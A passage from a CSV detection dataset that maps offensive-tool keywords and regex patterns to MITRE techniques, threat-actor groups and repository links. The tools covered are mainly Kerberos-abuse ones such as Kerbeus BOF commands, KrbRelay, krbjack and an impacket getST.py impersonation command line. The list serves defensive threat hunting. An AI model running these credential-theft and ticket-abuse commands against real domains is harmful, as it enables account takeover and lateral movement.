Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50576" "*krb_ptt /ticket:*",".{0,1000}krb_ptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50577" "*krb_purge /*",".{0,1000}krb_purge\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - 
APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50578" "*krb_renew /ticket:*",".{0,1000}krb_renew\s\/ticket\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik 
Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50579" "*krb_s4u /*",".{0,1000}krb_s4u\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50580" "*krb_tgtdeleg /*",".{0,1000}krb_tgtdeleg\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50581" 
"*krb_tgtdeleg(*)*",".{0,1000}krb_tgtdeleg\(.{0,1000}\).{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50582" "*krb_triage /*",".{0,1000}krb_triage\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50583" "*krb2john.py*",".{0,1000}krb2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50584" "*krb5/kerberosv5.py*",".{0,1000}krb5\/kerberosv5\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not 
require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","50585" "*KRB5CCNAME=*.ccache* getST.py -self -impersonate * -k -no-pass -dc-ip *",".{0,1000}KRB5CCNAME\=.{0,1000}\.ccache.{0,1000}\sgetST\.py\s\-self\s\-impersonate\s.{0,1000}\s\-k\s\-no\-pass\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 
- TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50586" "*krb5decoder*",".{0,1000}krb5decoder.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50587" "*krb5-enum-users *",".{0,1000}krb5\-enum\-users\s.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50588" "*krb5-enum-users.*",".{0,1000}krb5\-enum\-users\..{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50589" "*krbasktgt /*",".{0,1000}krbasktgt\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR 
- Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50590" "*krbcredccache.py*",".{0,1000}krbcredccache\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","50591" "*krbjack 
-*",".{0,1000}krbjack\s\-.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","50592" "*krbjack.tcpforward*",".{0,1000}krbjack\.tcpforward.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","50593" "*krbjacker.py*",".{0,1000}krbjacker\.py.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","50594" "*krbjack-main*",".{0,1000}krbjack\-main.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","50595" "*KrbRelay by @Cube0x0*",".{0,1000}KrbRelay\sby\s\@Cube0x0.{0,1000}","offensive_tool_keyword","KrbRelay","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50596" "*KrbRelay by @Cube0x0*",".{0,1000}KrbRelay\sby\s\@Cube0x0.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#content","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","50597" "*KrbRelay by @Cube0x0*",".{0,1000}KrbRelay\sby\s\@Cube0x0.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50598" "*KrbRelay*misc*",".{0,1000}KrbRelay.{0,1000}misc.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","50599" "*KrbRelay*smb*",".{0,1000}KrbRelay.{0,1000}smb.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","50600" "*KrbRelay*spoofing*",".{0,1000}KrbRelay.{0,1000}spoofing.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","50601" "*KrbRelay.Clients.Attacks*",".{0,1000}KrbRelay\.Clients\.Attacks.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","50602" "*KrbRelay.csproj*",".{0,1000}KrbRelay\.csproj.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","50603" "*KrbRelay.exe *",".{0,1000}KrbRelay\.exe\s.{0,1000}","offensive_tool_keyword","KrbRelay","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation 